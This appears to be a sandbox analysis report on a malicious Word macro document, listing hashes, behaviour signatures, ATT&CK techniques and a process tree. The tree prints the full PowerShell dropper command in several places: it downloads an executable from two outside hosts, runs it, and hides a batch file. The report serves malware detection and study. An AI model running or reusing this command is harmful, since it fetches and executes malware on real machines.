1786759ce3f8294887c1dd6a2431fe69af2af80d33b022b3f7ca2a7595e2e488

Analysis

max time kernel
102s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10/05/2024, 08:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e3875e26c9f346b54c4afa12b04ac29_JaffaCakes118.doc
Size

85KB
MD5

2e3875e26c9f346b54c4afa12b04ac29
SHA1

9efc30c5886061492acc697ae2c6fb568080dc7b
SHA256

1786759ce3f8294887c1dd6a2431fe69af2af80d33b022b3f7ca2a7595e2e488
SHA512

577c22949f5c785c7d47a193ab61ec4f0a15c0876c440d643b4c226ab9fbe23f164c34939152be66762813b3f13909dbe8e301335c926627b5365554b8ef2d77
SSDEEP

768:MTXUAvRB5LcJgwo4r65/KCBuxEYqdUqVt/azV8Vq4rYWAHpP7p6pXpc:KlvRB5QIv3yqCWAHd7g56

Score

10^/10

execution

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	5028	3400	cmd.exe	81

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	3868	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5068	powershell.exe
3868	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3400	WINWORD.EXE
3400	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5068	powershell.exe
5068	powershell.exe
3868	powershell.exe
3868	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3400	WINWORD.EXE
3400	WINWORD.EXE
3400	WINWORD.EXE
3400	WINWORD.EXE
3400	WINWORD.EXE
3400	WINWORD.EXE
3400	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3400 wrote to memory of 5028	3400	WINWORD.EXE	88
PID 3400 wrote to memory of 5028	3400	WINWORD.EXE	88
PID 5028 wrote to memory of 5068	5028	cmd.exe	90
PID 5028 wrote to memory of 5068	5028	cmd.exe	90
PID 5068 wrote to memory of 1292	5068	powershell.exe	92
PID 5068 wrote to memory of 1292	5068	powershell.exe	92
PID 1292 wrote to memory of 3868	1292	cmd.exe	94
PID 1292 wrote to memory of 3868	1292	cmd.exe	94

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2e3875e26c9f346b54c4afa12b04ac29_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Svysntgc5([String] $Ucd7){(New-Object System.Net.WebClient).DownloadFile($Ucd7,''C:\Users\Admin\AppData\Local\Temp\Zzqob.exe'');Start-Process ''C:\Users\Admin\AppData\Local\Temp\Zzqob.exe'';}try{Svysntgc5(''http://chimachinenow.com/kperotac.bin'')}catch{Svysntgc5(''http://basarteks.com/kperotac.bin'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\Admin\AppData\Local\Temp\kiwuooye2.bat;Start-Process 'C:\Users\Admin\AppData\Local\Temp\kiwuooye2.bat' -WindowStyle Hidden"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell "'PowerShell ""function Svysntgc5([String] $Ucd7){(New-Object System.Net.WebClient).DownloadFile($Ucd7,''C:\Users\Admin\AppData\Local\Temp\Zzqob.exe'');Start-Process ''C:\Users\Admin\AppData\Local\Temp\Zzqob.exe'';}try{Svysntgc5(''http://chimachinenow.com/kperotac.bin'')}catch{Svysntgc5(''http://basarteks.com/kperotac.bin'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\Admin\AppData\Local\Temp\kiwuooye2.bat;Start-Process 'C:\Users\Admin\AppData\Local\Temp\kiwuooye2.bat' -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kiwuooye2.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell "function Svysntgc5([String] $Ucd7){(New-Object System.Net.WebClient).DownloadFile($Ucd7,'C:\Users\Admin\AppData\Local\Temp\Zzqob.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\Zzqob.exe';}try{Svysntgc5('http://chimachinenow.com/kperotac.bin')}catch{Svysntgc5('http://basarteks.com/kperotac.bin')}
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
74fd3bb20b5c047c4ef9ff119744dc1f

SHA1
26ffb8c890a071c7c73c7e90789c4f2f709ddb2d

SHA256
950d6a3f91c5f3f823e14f14390f1ad57ddf504256262a778ca1ebe1fb91d2cf

SHA512
f1600c164f93cafa4b0e393892b386bf0ef98939316aabf9a90106b8fa3116adae2745a0c8037e72532e2462b973cf8aabb89ceecf9c469d0a2b0a3194c9ae3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD89FC.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3r3ptfjj.odl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kiwuooye2.bat

Filesize
318B

MD5
5c524f52105412730e8369da16107b59

SHA1
48d008859165ad5447678e07ac037eaa883e8774

SHA256
8844aaca480d259841de94a80743edfc95c49efd1af2fec6948b36f860ff6d6e

SHA512
c5944fef5854ce26e5b7457c4623647b0201ecb7d253aecdd42430c49b96dfcdc2927e24c1f31025a571eaf1a65d560c7e7bf049fdd3157b47727404cd794b8a

Download Submit
memory/3400-12-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-17-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-6-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-9-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-14-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-15-0x00007FFEC5C10000-0x00007FFEC5C20000-memory.dmp

Filesize
64KB

Download
memory/3400-13-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-2-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-11-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-10-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-8-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-16-0x00007FFEC5C10000-0x00007FFEC5C20000-memory.dmp

Filesize
64KB

Download
memory/3400-18-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-60-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-20-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-59-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-30-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-31-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-43-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-55-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-50-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-49-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-7-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-57-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-19-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-58-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-56-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-5-0x00007FFF0806D000-0x00007FFF0806E000-memory.dmp

Filesize
4KB

Download
memory/3400-599-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-0-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-4-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-1-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-91-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-3-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-569-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-570-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-571-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-572-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-573-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-574-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3400-596-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-597-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-595-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/3400-598-0x00007FFEC8050000-0x00007FFEC8060000-memory.dmp

Filesize
64KB

Download
memory/5068-70-0x000001FF9E410000-0x000001FF9E432000-memory.dmp

Filesize
136KB

Download